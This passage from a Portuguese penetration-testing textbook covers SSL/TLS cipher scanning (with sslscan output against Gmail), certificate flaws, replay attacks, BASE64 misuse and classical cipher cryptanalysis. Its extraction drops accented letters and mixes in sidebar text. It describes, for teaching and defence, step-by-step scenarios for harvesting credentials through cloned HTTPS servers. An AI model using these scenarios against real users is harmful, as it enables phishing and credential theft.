EDH-RSA-DES-CBC3-SHA - 168 Bits - unsupported
EDH-DSS-DES-CBC3-SHA - 168 Bits - unsupported
...
EXP-DES-CBC-SHA - 40 Bits - unsupported

EXP-RC2-CBC-MD5 - 40 Bits - unsupported
EXP-RC4-MD5 - 40 Bits - unsupported

GNU
Acrnimo recursivo
q
para GNUs Not Unix.
A ltima ferramenta que ser abordada nesta seo a SSL Scan, desenvolvida e distri- O projeto GNU
buda pela empresa Titania, sob uma licena GPLv3. iniciou-se em 1983 com
o objetivo de criar um
Para gerar o binrio, necessrio utilizar o compilador GNU C e ter o OpenSSL instalado sistema operacional
completo, similar ao
no ambiente. Alm de testar diversas sutes a partir de uma nica execuo, o SSL Scan
Unix, baseado somente
tambm exibe informaes sobre o certificado e lista quais so os mecanismos escolhidos em softwares livres.
414
por padro, para os protocolos SSLv2, SSLv3 e TLSv1, quando disponveis. Observe-se,
abaixo, o relatrio parcial da execuo do utilitrio contra o GMail.
~$ sslscan gmail.google.com
_
_ _ _ _ _ _| |_ _ _ ___ __ _ _ __
/ _ _/ _ _| / _ _|/ _ _/ _ | _ \
\_ _ \_ _ \ \_ _ \ (_| (_| | | | |
|_ _ _/_ _ _/_|_ _ _/\_ _ _\_ _,_|_| |_|
Version 1.8.2
http://www.titania.co.uk
Copyright Ian Ventura-Whiting 2009
Testing SSL server gmail.google.com on port 443
Supported Server Cipher(s):
Rejected SSLv2 168 bits DES-CBC3-MD5
Rejected SSLv2 56 bits DES-CBC-MD5
Rejected SSLv2 40 bits EXP-RC2-CBC-MD5
...
Rejected SSLv3 256 bits ADH-AES256-SHA
Rejected SSLv3 256 bits DHE-RSA-AES256-SHA
Rejected SSLv3 256 bits DHE-DSS-AES256-SHA
Accepted SSLv3 256 bits AES256-SHA
Rejected SSLv3 128 bits ADH-AES128-SHA
...
Rejected TLSv1 256 bits DHE-RSA-AES256-SHA

Rejected TLSv1 256 bits DHE-DSS-AES256-SHA
Accepted TLSv1 256 bits AES256-SHA
Rejected TLSv1 128 bits ADH-AES128-SHA
Rejected TLSv1 128 bits DHE-RSA-AES128-SHA
Rejected TLSv1 128 bits DHE-DSS-AES128-SHA
Accepted TLSv1 128 bits AES128-SHA
...
415
Prefered Server Cipher(s):
SSLv3 128 bits RC4-SHA
TLSv1 128 bits RC4-SHA
SSL Certificate:
Version: 2
Serial Number: -4294967295
Signature Algorithm: sha1WithRSAEncryption
Issuer: /C=US/O=Google Inc/CN=Google Internet Authority
Not valid before: Oct 21 19:44:58 2010 GMT
Not valid after: Oct 21 19:54:58 2011 GMT
Subject: /C=US/ST=California/L=Mountain View/O=Google Inc/CN=*.

google.com
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:96:2a:f2:79:d6:2b:e9:49:ae:96:1b:60:12:39:
ac:9c:b2:ee:84:ac:b9:5a:7e:0e:b2:ef:7c:0a:5a:
7b:f0:82:db:52:c5:09:13:1f:65:38:e7:da:af:4b:
53:39:fe:50:3d:2a:d5:e9:de:31:3a:a5:05:1c:65:
b6:59:32:de:56:90:a0:c4:09:de:dc:e3:4b:17:b6:
bc:59:47:fa:e8:95:5b:d5:52:ba:2f:c7:95:74:8d:
e4:d1:17:ae:06:97:ba:f6:22:6e:48:85:aa:8d:c3:
e8:da:74:60:4f:9a:a3:43:4f:6e:e2:29:eb:e0:aa:
9e:bb:a7:ed:16:6a:17:7a:35
Exponent: 65537 (0x10001)
X509v3 Extensions:
X509v3 Subject Key Identifier:
A8:C9:67:22:2E:EE:32:78:B3:E2:B9:18:5B:62:87:1F:87:2D:4E:42
X509v3 Authority Key Identifier:
...
416
Problemas com o certificado digital
Para verificar se h algum problema com o certificado digital utilizado por um ser- q
vidor, basta acessar com um navegador web qualquer pgina da aplicao servida por
HTTPS. Se algo no estiver bem configurado, uma advertncia parecida com a ilustrada
pela Figura 9.1 ser exibida, indicando uma vulnerabilidade. Situaes relacionadas
ao certificado instalado, que impedem que a negociao SSL/TLS seja realizada com
sucesso incluem:
1 Certificado expirado.
1 Certificado vlido a partir de data posterior atual.
1 Certificado autoassinado.
1 Certificado emitido por autoridade certificadora desconhecida pelo navegador.
1 Certificado revogado.
1 Assinaturas digitais invlidas na cadeia de certificao.
1 Nome de domnio do stio web no incluso no(s) contido(s) no certificado.
Quando a aplicao sofre dessa vulnerabilidade, o usurio fica acostumado com a apresentao
da mensagem de erro, pelo navegador web, e continua o acesso, ignorando-a. Isso abre caminho
para um ataque, que permite coletar identificadores de usurio e as respectivas senhas:
1. O atacante prepara um servidor falsificado, com cpia da tela de autenticao da apli-

cao vulnervel.
2. Por meio de um ataque de redirecionamento ou de engenharia social, o usurio condu-

zido ao servidor ilegtimo. Como o navegador sempre reclama do certificado apresentado
na negociao SSL/TLS, o usurio no percebe que est acessando uma pgina clonada e
fornece identificador e senha, para autenticar-se.
3. O sistema forjado captura as credenciais fornecidas, realiza a autenticao na aplicao

original e redireciona o usurio para o servidor correto.
Acesso a domnio no verificado

Este problema decorre de um cliente web que no verifica se o nome de domnio da apli- q
cao sendo acessada o mesmo que o contido no certificado digital apresentado pelo
servidor. Quando este passo no executado, a conexo pode ser estabelecida com um
servidor falsificado, caso seja possvel redirecionar o usurio.
Antigamente, muitos clientes SSL no efetuavam a verificao e eram, portanto, vulner-

veis. Hoje em dia, porm, muito raro encontrar navegadores web ou clientes SSL/TLS
que no realizem o teste e, assim, somente clientes proprietrios devem ter este aspecto
verificado em um teste de invaso.
Caso seja necessrio, o procedimento de teste consiste em montar um servidor web e

configur-lo com um certificado vlido para um domnio qualquer e com chave privada
correspondente. Em seguida, deve-se enganar o cliente web para acessar esse servidor, via
HTTPS, como se fosse o original de um domnio arbitrrio. Isso pode ser realizado em sis-
temas Windows e Linux, pela incluso de uma linha no arquivo hosts, mapeando o domnio
desejado para o endereo IP do servidor de teste. Caso o acesso seja realizado sem nenhum
problema, o cliente no realiza a verificao e vulnervel.
417
Um possvel cenrio de explorao da vulnerabilidade descrito a seguir:
1. O atacante obtm um certificado digital e chave privada correspondente vlidos de um

domnio XYZ qualquer, por meio da explorao de um servidor vulnervel, ou gerando
as chaves e comprando o certificado de uma autoridade certificadora com processos de
verificao de identidade ineficazes.
2. Um servidor web criado com contedo clonado do domnio ABC e com HTTPS
configurado com o par de chaves do primeiro passo.
3. Um e-mail enviado a um conjunto de vtimas para que acessem o servidor malicioso,

como sendo do domnio ABC.
4. Durante a negociao SSL, o servidor clonado envia o certificado do domnio XYZ para
o navegador, que verifica, com sucesso, data de validade, assinaturas da cadeia de
certificao e estado no revogado, mas no valida o domnio. Como nenhum erro
ocorre, a chave pblica extrada e utilizada para compor a mensagem client_key_
exchange, enviada, em seguida, ao servidor.
5. O servidor capaz de extrair o contedo da mensagem client_key_exchange, pois

possui a chave privada associada ao certificado do domnio XYZ, e completar as opera-
es para estabelecimento de chaves.
6. As mensagens change_cipher_spec e finished so trocadas entre as duas partes e o

protocolo encerra-se normalmente, com a vtima conectada a um servidor falsificado.
Uso de protocolos proprietrios

Projetar protocolos seguros uma tarefa to difcil quanto criar bons algoritmos cripto- q
grficos. Assim, a chance de um protocolo caseiro ser livre de vulnerabilidades extre-
mamente baixa, ainda mais quando ele a criao de uma equipe no especializada.
Similarmente, a anlise de segurana de protocolos criptogrficos tambm requer conhe-

cimentos avanados e especficos que esto muito alm do escopo deste texto. Um ponto
de partida para aqueles que queiram se aprofundar neste assunto o Handbook of Applied
Cryptography (Menezes et al., 2001). Pelos motivos expostos, esta seo limitar-se- a enu-
merar, com base na obra supracitada, os principais tipos de ataques contra protocolos de
segurana, e a fornecer um nico exemplo:
1 Personificao o atacante se passa por uma das entidades participantes do protocolo. q

1 Repetio dados obtidos de execues passadas do protocolo so reenviados a um
ou mais participantes do protocolo.
1 Intercalao informaes obtidas de mltiplas execues, antigas ou em anda-

mento, so combinadas em uma nova execuo.
1 Reflexo uma mensagem de protocolo recebida de uma entidade devolvida para

o remetente.
1 Espera forada uma mensagem interceptada e encaminhada em um momento

posterior.
418
Considere-se como exemplo o protocolo de autenticao ilustrado na Figura 9.3:
1. Usurio fornece identificador e senha em tela de autenticao.
2. O sistema calcula o hash da senha, antes de envi-la ao servidor por meio de um canal
inseguro. A justificativa para isso que, dada a resistncia da pr-imagem, computacio-
nalmente infactvel recuperar a senha em claro a partir do hash capturado.
3. O servidor recebe as credenciais do usurio e faz uma busca na base de autenticao a

partir do identificador do usurio.
4. Se o hash da senha recebida for idntico ao armazenado na base, o usurio conside-

rado autntico.
Senha: fs@.79k8 F.Hash
Alice
Alice, 0x0243af7a23548a8
0eeba8f951314fa8c
canal inseguro
Id, hash recebido
Figura 9.3 =?
Protocolo de auten- Id, 0x0243af7a23548a8
ticao vulnervel. 0eeba8f951314fa8c
Qual a vulnerabilidade apresentada por este esquema? O problema reside na transmisso

das credenciais por um canal no protegido. No caso, irrelevante saber a senha em claro,
pois o hash dela que est sendo utilizado para autenticar o usurio. Desse modo, uma
pessoa maliciosa pode, em um ataque de repetio, capturar o trfego, obter o hash e
reenvi-lo posteriormente ao servidor para autenticar-se de maneira ilegtima.
Tipos de vulnerabilidades
Que tipos de vulnerabilidades podem estar presentes na configurao de um tnel SSL/TLS?
Que falhas recentes foram encontradas nos protocolos SSL/TLS?

Contramedidas
Os seguintes pontos devem ser observados para evitar-se uma comunicao insegura q
com a aplicao web:
1 No utilize protocolos de segurana desenvolvidos caseiramente.

1 Configure o servidor para aceitar apenas sutes criptogrficas fortes, descartando,
assim, algoritmos de exportao, datados e quebrados.
419
1 No utilize verses de SSL anteriores a 3.0 e prefira o uso do protocolo TLS. q
1 Compre e instale um certificado digital de uma autoridade certificadora conhecida e
confivel. No deixe que o certificado expire, adquirindo um novo antes que isso acontea.
1 Para aplicaes internas, caso uma infraestrutura de chaves pblicas prpria seja uti-
lizada, instale o certificado raiz correspondente nos navegadores web dos usurios.
1 No permita que um recurso servido por meio do protocolo HTTPS tambm seja
acessvel por HTTP.
1 Proteja a chave privada do servidor, preferencialmente, partilhando-a entre vrios custo-

diantes e fornecendo-a ao sistema, sempre que necessrio, por meio de cerimnia oficial.
1 Caso implemente o lado cliente dos protocolos SSL/TLS, lembre-se sempre de

verificar a validade do certificado recebido e conferir o nome de domnio acessado
contra o contido no certificado.
Vulnerabilidades no armazenamento de informaes

relativamente comum encontrar sistemas que apenas se preocupam em proteger as q
informaes em trnsito e que se esquecem (ou ignoram) de proteg-las durante
o armazenamento.
Nesse caso, uma nica vulnerabilidade no servidor pode ser suficiente para permitir a recu-
perao das informaes que esto em claro no disco. O usurio malicioso, obviamente, no
se esforar para quebrar os mecanismos criptogrficos utilizados na proteo do canal de
comunicao, na presena de um caminho mais fcil a ser trilhado.
Por outro lado, quando existe a preocupao em cifrar dados sigilosos, a maior vulne- q
rabilidade encontrada com relao proteo das chaves criptogrficas utilizadas.
Normalmente, os desenvolvedores as embutem no cdigo, achando que, uma vez com-
pilados os programas, ser difcil que algum as recupere.
Este pensamento, muito comum, infelizmente, est equivocado. Por exemplo, se a chave foi
colocada como uma cadeia de caracteres, basta utilizar um comando como o strings do
Linux, para encontrar a informao desejada. Caso a chave seja ofuscada, tcnicas de depu-
rao do programa podem ser empregadas, chegando-se ao mesmo resultado.
Mesmo que fosse impossvel descobrir a chave, por meio da anlise do binrio, tal prtica
fere os preceitos de gerenciamento de chaves criptogrficas. O motivo que a chave teria
criptoperodo infinito, isto , ela nunca expiraria, salvo se novo binrio fosse gerado, com
substituio da chave. Note-se que o objetivo em se estabelecer um tempo mximo para o
uso de uma chave limitar: a quantidade de texto cifrado para criptoanlise; o montante de
informao em caso de comprometimento; o uso do algoritmo ao tempo de vida esperado;
o tempo disponvel para ataques de fora bruta (Menezes et al., 2001).
q
Pensando no ciclo de vida das chaves criptogrficas, um ponto que merece, mas no
recebe, bastante ateno a fase de criao, que deve empregar mtodos que garantam
um bom nvel de aleatoriedade.
No incomum encontrar programas que baseiam a gerao de chaves em funes como

rand(), na linguagem C, e em classes como Random, em Java. Ou, pior ainda, empregam
cadeias fixas como 01234567..., 000000... e ffffff..., as quais, dada a frequncia com que
aparecem, so candidatas naturais a serem testadas.
420
DES Muitas empresas utilizam cifras caseiras ou clssicas na proteo de informaes q
Data Encryption valiosas, conforme constatado em diversas auditorias e anlises de vulnerabilidades
Standard uma cifra
realizadas pelo autor deste texto.
simtrica de blocos,
definida pelo padro
americano FIPS 46-2, Na grande maioria dos casos, empregavam-se cifras de substituio monoalfabtica
que utiliza blocos de com chaves fixas como parte da transformao; em outros, as informaes eram apenas
64 bits e chaves de
codificadas em BASE64. No nem necessrio dizer que todas essas solues fornecem um
56 bits. Devido ao
pequeno tamanho, foi nvel de segurana quase nulo. Um pouco melhor, mas ainda problemtico face ao valor das
quebrada, em 1998, informaes protegidas, o uso de DES simples, contra o qual ataques de fora bruta so
por uma mquina
viveis a um custo relativamente baixo.
q
criada especificamente
para executar busca
Aspectos mais sutis, com relao ao armazenamento seguro de informaes, esto rela-
exaustiva de chaves.
cionados a detalhes de desenvolvimento da soluo.
Por exemplo, se as posies de memria contendo chaves criptogrficas no forem zeradas

Swap antes de liberadas, ou se essas mesmas regies forem para disco, no processo de swap do
Em sistemas sistema operacional, acesso no autorizado s chaves poder ocorrer.
operacionais, o
mecanismo em que
pginas de memria Uso de BASE64
so copiadas para disco,
quando no h mais BASE64 o nome dado a um grupo de esquemas de codificao, que representam q
espao disponvel na cadeias de octetos como caracteres imprimveis, pertencentes a um conjunto de
memria principal do 65 caracteres ASCII.
computador, de modo a
permitir que as pginas Um deles, o caractere =, utilizado para preenchimento do resultado, para que o tamanho
necessrias ao processo
ativo sejam carregadas. seja sempre mltiplo de quatro. Os demais so mapeados, conforme Figura 9.4, para os
valores 0 a 63, que compreendem todas as possibilidades de um nmero de seis bits.
ASCII Valor 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
Acrnimo para
Cdigo A B C D E F G H I J K L M N O P
American Standard
Code for Information
Interchange,
um esquema de Valor 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
codificao que mapeia
caracteres para valores Cdigo Q R S T U V W X Y Z a b c d e f
numricos entre 0 e
255, considerando,
tambm, a parte
Valor 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
estendida da tabela.
Cdigo G h i j k l m n o p q r s t u v
Valor 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63
Figura 9.4
Mapeamento utiliza- Cdigo W x y z 0 1 2 3 4 5 6 7 8 9 + /
do em BASE64.
A entrada processada da esquerda para a direita, trs octetos por vez, os quais q
resultam em quatro caracteres codificados. Caso o tamanho da mensagem no seja ml-
tiplo de trs, o ltimo bloco conter um ou dois octetos e dever ser tratado de maneira
especial, conforme Figura 9.5 e Figura 9.6, respectivamente:
1 Um octeto quatro bits 0 devem ser adicionados ao final do octeto, de modo a com-
pletar 12 bits, que so ento mapeados para dois caracteres, concatenados com ==.
1 Dois octetos dois bits 0 devem ser adicionados ao final dos octetos, completando
18 bits, que so ento mapeados para trs caracteres, concatenados com =.
421
Bits adicionados
octeto
0 0 0 0
Figura 9.5
Codicado 1 Codicado 2 = = Codificao em
BASE64, quando o
ltimo bloco possui
Preenchimento um octeto.
Bits adicionados
1 octeto 2 octeto
0 0 Figura 9.6
Codificao em
Codicado 1 Codicado 2 Codicado 3 =
BASE64, quando o
ltimo bloco possui
Preenchimento
dois octetos.
Um exemplo completo de codificao pode ser observado na Figura 9.7. A primeira linha
ilustra a entrada, em caracteres imprimveis, correspondente palavra Teste; na segunda,
esto representados os valores ASCII de cada caractere, em binrio, alm dos dois bits 0
adicionados; a seguinte mostra o agrupamento em blocos de 6 bits e a ltima, o resultado
em BASE64. Para realizar a decodificao, basta desfazer cada um dos passos, iniciando pelo
ltimo deles.
Um ponto importante, que deve ser notado, que os processos de converso no q

dependem de nenhum segredo e, assim, qualquer pessoa capaz de execut-los.
Isto implica que o mecanismo no deve nunca ser utilizado para proteo do sigilo de
informaes.
Figura 9.7
Exemplo de codifi-
cao em BASE64.
Dado o alfabeto caracterstico utilizado, muito fcil reconhecer dados codificados em
BASE64. Em um teste de invaso, sempre que informaes nesse formato forem encon-
tradas, deve-se proceder decodificao delas, para constatar se o mecanismo no est
sendo incorretamente utilizado para prover confidencialidade. Algumas vezes, pode ocorrer
de haver um prefixo ou sufixo, normalmente, em outro formato, que precisa ser ignorado
para que a recuperao da informao original seja possvel.
BASE64
seguro utilizar BASE64 para proteo de informaes sensveis? Justifique sua resposta.
Identificao e quebra de cifras clssicas

Infelizmente, ainda hoje, encontram-se sistemas que utilizam cifras clssicas na proteo q
de informaes sensveis. Esses algoritmos criptogrficos histricos so quebrados facil-
mente, mesmo sem a ajuda de computadores, o que torna o fato bem preocupante.
422
Como h uma chance no marginal de se deparar com esse cenrio, importante saber como
so os processos de criptoanlise que podem ser empregados em cada caso. Afinal, a sub-
trao de informaes de um ambiente um dos principais objetivos de um teste de invaso.
Conceitos adicionais sobre cifras

Cifras de substituio simples e de transposio so duas classes bsicas, mas impor- q
tantes, de cifras simtricas. As primeiras, tambm chamadas de cifras monoalfabticas,
definem um mapeamento entre o alfabeto em claro para o de ciframento, que utilizado
na substituio de cada elemento do texto original por outro, como exemplificado pela
Figura 9.8. As de transposio, por sua vez, operam sobre blocos de tamanho fixo pr-
-estabelecido, permutando os elementos de cada um deles, segundo uma regra definida.
Uma terceira classe de cifras, a de substituio polialfabtica, trabalha com um conjunto

de n mapeamentos de substituio, que so aplicados ordenada e ciclicamente aos
caracteres do texto em claro.
O objetivo evitar que as frequncias dos elementos da mensagem original sejam refletidas
no texto cifrado, como ocorre com a letra e, no exemplo da Figura 9.8. Embora isto evite
alguns ataques, outros ainda so possveis, salvo em alguns casos, em que algumas condi-
es muito especiais so satisfeitas. As cifras clssicas que sero analisadas nesta seo,
basicamente, so variaes desta e da primeira categoria.
Figura 9.8
Exemplo de cifra
de substituio
simples.
Com o mesmo propsito acima mencionado, cifras de substituio homofnica mapeiam q

para cada caractere do alfabeto original um conjunto de t smbolos, com a restrio de
no haver elementos comuns entre os diversos conjuntos.
Claramente, em um esquema assim, o alfabeto de ciframento deve conter, no mnimo, t vezes

o nmero de elementos do original, seno no possvel satisfazer o requisito mencionado.
O processo de ciframento de um caractere, por sua vez, consiste em substitu-lo por um ele-
mento selecionado aleatoriamente do grupo mapeado para ele. Desse modo, a frequncia de
ocorrncia de um elemento no texto em claro dividida entre t smbolos no texto cifrado.
Por conveno, quando cifras clssicas so utilizadas, o texto em claro representado q

em letras minsculas e o cifrado em letras maisculas. Alm disso, o alfabeto original e o
de ciframento so idnticos, apesar disso no ser um requisito fundamental. Finalmente,
assume-se que o atacante sabe a lngua da mensagem original e a cifra que foi utilizada
para proteg-la.
423
ndice de coincidncia (IC)
O primeiro passo antes de atacar um texto cifrado identificar o tipo de algoritmo que q
foi utilizado, pois os mtodos de criptoanlise diferem para cada classe. Especificamente
para os criptossistemas histricos, o objetivo determinar se foram empregadas cifras
monoalfabticas, polialfabticas ou de transposio. O ndice de coincidncia, introdu-
zido por William Friedman em 1922 (Friedman, 1922; Swenson, 2008), uma ferramenta
estatstica que pode ser utilizada para este propsito, pois ela mede a distribuio dos
caracteres em um texto.
Para compreender como calcular o ndice, sero utilizados alguns conceitos elementares de
probabilidade. Imagine-se uma urna contendo n papis, cada um com uma nica letra do
alfabeto latino, denotado por A. Se forem retirados, aleatoriamente e sem reposio, exata-
mente dois papis, qual a probabilidade de que contenham a mesma letra? A resposta desta
pergunta dada pelo ndice de coincidncia.
Seja n , A, o nmero de ocorrncias da letra na urna. Dessa definio segue imediata-

mente que n = na + nb + ... + nz , pois, a soma das frequncias individuais igual ao nmero total
de papis. A chance de se retirar a letra a nas duas escolhas de na /n x (na 1)/(n 1) = pa ,
pois o papel no devolvido ao recipiente. Semelhantemente, para a letra b, a probabilidade
de nb /n x (nb 1)/(n 1) = pb , e assim por diante. Uma vez que esses eventos so mutuamente
exclusivos, a probabilidade procurada a soma de p , com A:
n_ (n_-1)
IC(n) = P =
n (n-1)
A A
No caso de uma distribuio homognea, na = n/26, para toda letra do alfabeto. Substituindo
na frmula acima, obtm-se:
n n n - 26
x( - 1)
26 26 26 n-26 n-26
IC(n) = = = 26 x =
n (n-1) 26 (n -1) 26 26 (n -1) 26n - 26
A A
Supondo uma enorme quantidade de papis, isto , com n tendendo ao infinito, possvel
calcular o ndice por meio do limite da funo:
n - 26 L'Hpital 1 ~ 0,03846
lim IC(n) = lim lim IC(n) = =
ng ng 26n - 26 ng 26
Este valor de IC, denotado por IC A , reflete uma sequncia de letras aleatoriamente selecionada
a partir de uma distribuio uniforme. Para um texto em uma lngua qualquer, entretanto, as
frequncias no so homogneas, mas, sim, apresentam um padro estatstico, que depende
do idioma. De modo a obter o ndice de coincidncia, nesses casos, deve-se atribuir os valores
correspondentes a n , A, e calcular o limite da funo IC(n), de maneira similar ao exemplo

acima. A Figura 9.9, adaptada de (Gaines, 1939 e Singh, 1999), ilustra as frequncias individuais
das letras em diversos idiomas e o ndice de coincidncia relacionado.
424
Figura 9.9
Tabela de frequn-
cias individuais de
letras em diversos
idiomas.
Mas como o ndice de coincidncia pode ser utilizado com o propsito enunciado? q
Recorde-se que em cifras monoalfabticas as frequncias das letras no texto em claro so
refletidas no texto cifrado, embora em smbolos diferentes, e observe-se que em cifras
de transposio elas no so alteradas. Isso implica que o IC, nesses dois casos, deve
ser prximo ao do idioma da mensagem. Por outro lado, quando cifras polialfabticas e
homofnicas so empregadas, a frequncia original das letras diluda no texto cifrado e,
portanto, o IC deve aproximar-se de IC A .
Cifra de Cesar
A cifra de Cesar, atribuda folcloricamente ao imperador romano Jlio Cesar, pertence q
classe de algoritmos de substituio monoalfabtica e consiste em se trocar cada letra
do texto em claro por aquela situada trs posies adiante no alfabeto romano. Note-se
que neste esquema a transformao fixa e, logo, uma chave no utilizada.
Isto uma pssima prtica, pois requer que o algoritmo seja mantido em sigilo e, se
ele for comprometido, um novo mecanismo deve ser projetado para substitu-lo. Para
quebrar este criptossistema, basta tentar decifr-lo pelas vias normais, isto , substituir
cada letra do texto cifrado por aquela que ocupa a terceira posio anterior no alfabeto.
425
O mapeamento utilizado por esta cifra, bem como um exemplo, est ilustrado na Figura 9.10.
Cifra de deslocamento e ROT13 Figura 9.10

Mapeamento da
Conforme explicado anteriormente, uma das fraquezas da cifra de Cesar que ela utiliza cifra de Cesar
uma transformao fixa, sem chave. e exemplo.
Uma possibilidade de melhoria resulta na cifra de deslocamento, em que a rotao do q

alfabeto latino parametrizada pelo valor da chave k. Desse modo, ao todo, existem
26 mapeamentos de ciframento possveis, que correspondem ao nmero total de chaves
aceitas. A cifra de Cesar, no caso, uma particularizao deste esquema, com k = 3, pois
este o nmero de vezes em que o alfabeto deslocado.
O exemplo abaixo, por sua vez, ilustra esta cifra com chave k = 10.
Um espao de chaves pequeno como este, porm, no acrescenta muito segurana, q Figura 9.11
Exemplo de cifra de
uma vez que possvel executar um ataque de fora bruta, no qual todas as possibili- deslocamento com
dades so testadas, uma a uma. Disso, pode-se pensar erroneamente que, para obter chave k = 10.
uma cifra segura, basta aumentar o nmero total de chaves.
Para esclarecer este ponto, considere-se que uma cifra simtrica um cofre, com segredo
de mil dgitos. Obviamente, quanto maior o comprimento deste valor, mais difcil varrer
todas as combinaes possveis. Mas para quebrar o sistema isto realmente neces-
srio? Depende! Se o mecanismo for fraco, o melhor ataque deixa de ser a fora bruta. Na
analogia, se o cofre for de madeira, quem vai se preocupar em testar todos os segredos?
muito mais fcil destruir o prprio cofre!
Como exemplo de criptoanlise, considere-se que o texto cifrado YKMAXGTIG foi intercep-
tado. Sabendo que a cifra de deslocamento foi utilizada, deve-se tentar decifr-lo com cada
uma das chaves existentes, a partir de k = 1, at que texto legvel seja recuperado. Os passos
realizados neste processo, ilustrados na Figura 9.12, finalizam em k = 6, quando o texto em
claro seguranca encontrado.
426
Texto
k Mapeamento
candidato
0 a b c d e f g h i j k l m n o p q r s t u v w x y z YKMAXGTIG
1 B C D E F G H I J K L M N O P Q R S T U V W X Y Z A xjlzwfshf
2 C D E F G H I J K L M N O P Q R S T U V W X Y Z A B wikyverge
3 D E F G H I J K L M N O P Q R S T U V W X Y Z A B C vhjxudqfd
4 E F G H I J K L M N O P Q R S T U V W X Y Z A B C D ugiwtcpec
5 F G H I J K L M N O P Q R S T U V W X Y Z A B C D E tfhvsbodb
6 G H I J K L M N O P Q R S T U V W X Y Z A B C D E F seguranca
Figura 9.12 O algoritmo ROT13, assim como a cifra de Cesar, uma particularizao da cifra de q
Exemplo de cripto- deslocamento, mas com chave k = 13.
anlise da cifra de
deslocamento. O ponto interessante que os processos de ciframento e de deciframento podem utilizar
exatamente a mesma transformao, pois duas aplicaes consecutivas do algoritmo fazem
com que cada letra do texto em claro seja substituda por aquelas 26 posies adiante no
alfabeto, ou seja, por ela mesma. Devido a este fato, a quebra do ROT13 trivial, bastando
aplic-lo sobre o texto cifrado que se julga ser texto protegido pelo algoritmo.
Cifra de substituio monoalfabtica genrica

A principal fraqueza da cifra de deslocamento reside no uso de um espao muito pequeno
de chaves criptogrficas, que descrevem somente as permutaes baseadas na rotao do
alfabeto romano.
Para compensar este problema, uma cifra de substituio monoalfabtica genrica q

permite que o mapeamento seja realizado para qualquer permutao do alfabeto de
entrada. Com isto, o total de chaves sobe para 26! = 403.291.461.126.605.635.584.000.
000 ~
= 288, o que ligeiramente superior a um algoritmo simtrico moderno com chave de
80 bits.
Uma vez que o espao de chaves deste esquema tem tamanho razovel para os dias
atuais, resta saber se o algoritmo tambm resistente, isto , se no h um ataque mais
eficiente que a busca exaustiva de chaves. O primeiro fato que deve ser levado em conta
que cifras de substituio simples apenas transferem as frequncias individuais dos
smbolos do texto em claro para outros caracteres no texto cifrado. Assim, por exemplo,
se a chave escolhida mapeia a letra a para J e existem 1 milho de as, no texto em
claro, a mesma quantidade de Js estar presente no texto cifrado. O segundo aspecto
importante que toda linguagem natural redundante, o que determina uma estrutura
caracterstica de frequncias e agrupamentos de letras (Menezes et al., 2001).
Sob a luz deste fato, a Figura 9.13 e a Figura 9.14 ilustram, respectivamente, os percentuais
de ocorrncia de cada letra nas lnguas inglesa e portuguesa.
Note-se que, no caso de nossa lngua nativa, as vogais respondem por aproximadamente
metade das letras em um texto. Este nmero bem inferior para o idioma norte-americano,
o qual gira em torno de 38%.
427
Figura 9.13
Frequncias das
letras na lngua
inglesa.
Para enfatizar como as frequncias das letras em idiomas especficos so refletidas em Figura 9.14
textos aleatrios, dois exemplos em ingls e dois em portugus sero fornecidos, junta- Frequncias das
letras na lngua
mente com os respectivos histogramas. A partir deles, importante constatar que, para portuguesa.
textos de tamanho razovel, o padro da lngua mantido, o que ser muito til no processo
de criptoanlise da cifra de substituio monoalfabtica.
Texto em ingls #1
O primeiro exemplo em ingls, retirado da revista Scientific American, expe o processo que
resultou na extino dos Neandertais, que, por muito tempo, coexistiram com nossa espcie.
Apesar de o texto ser pequeno, as frequncias individuais das letras esto muito prximas s
esperadas pelo idioma, conforme pode ser observado na Figura 9.15. Perceba-se, entretanto,
que a ordem dos elementos mais comuns est um pouco diferente da lngua inglesa, embora
ainda dentro do erro estatstico.
Some 28,000 years ago in what is now the British territory of Gibraltar, a group of Neander-
tals eked out a living along the rocky Medterranean coast. They were quite possibly the last
of their kind. Elsewhere in Europe and western Asia, Neandertals had disappeared thou-
sands of years earlier, after having ruled for more than 200,000 years. The Iberian Peninusla,
with its comparatively mild climate and rich array of animals and plants, seems to have been
the final stronghold. Soon, however, the Gibraltar population, too, would die out, leaving
behind only a smattering of their stone tools and the charred remnants of their campfires
(Wong, 2009).
428
Figura 9.15 Texto em ingls #2
Comparao das
frequncias das Este exemplo, extrado da revista Digital PhotoPro, apresenta o trabalho do fotgrafo
letras em ingls e Stuart Weston. Observe-se, na Figura 9.16, que, embora as distribuies sejam parecidas, as
em um trecho de
artigo. frequncias das letras mais comuns no esto muito aderentes estrutura da lngua. Esses
desvios, entretanto, so comuns para textos pequenos.
Stuart Weston is a multitalented bundle of energy who happens to make his living as a
fashion photographer. His previous careers include a stint as an aerospace engineer, and hes
apparently a talented drummer, painter and handyman. Hes currently building a log cabin
in the French countryside, which will be his respite from running a booming business one
that not only includes fashion photography, but also video production, graphic design and
postprocessing. It all started, though, because 30 years ago, he worked with a photographer
who was more interested in ogling models than he was in taking pictures (Savalich, 2009).
Figura 9.16 Texto em portugus #1

Comparao das
O seguinte trecho em portugus, de Mary Carmichael (2010), faz parte de uma matria que
frequncias das
letras em ingls e trata da vacina contra a malria e foi publicada na edio brasileira da revista Scientific
em um trecho de
artigo. American. Observando o histograma apresentado na Figura 9.17, fcil perceber como as
frequncias das letras do texto so muito prximas s da lngua, principalmente, para os
elementos mais comuns, com exceo da letra O.
Neste exato momento, em algum lugar do mundo numa placa de Petri em Baltimore,
talvez, ou nas glndulas salivares de um mosquito criado num laboratrio de Seattle, ou
ainda na corrente sangunea de um aldeo em Gana , est presente um composto qumico
que poder ajudar a erradicar a doena mais letal da histria da humanidade. Os cientistas
esto desenvolvendo muitas vacinas experimentais promissoras contra a malria, e, pela
429
primeira vez, uma delas atingiu a fase de testes avanados em humanos. Se esta ou outra
vacina potencial mostrar-se eficaz em humanos, mesmo que parcialmente, milhes de
crianas e mulheres grvidas podero ser salvas. Essa vacina seria a nica j desenvolvida
contra um parasita humano, um feito digno de Nobel. E poderia, na forma de sua primeira
gerao, ser distribuda na frica j em 2015 (Carmichael, 2010).
Texto em portugus #2
Figura 9.17
O texto a seguir, extrado da revista National Geographic, fala da expanso imobiliria que Comparao das
frequncias das
vem ocorrendo na cidade de guas Claras, DF, para comportar a legio de pessoas que letras em portugus
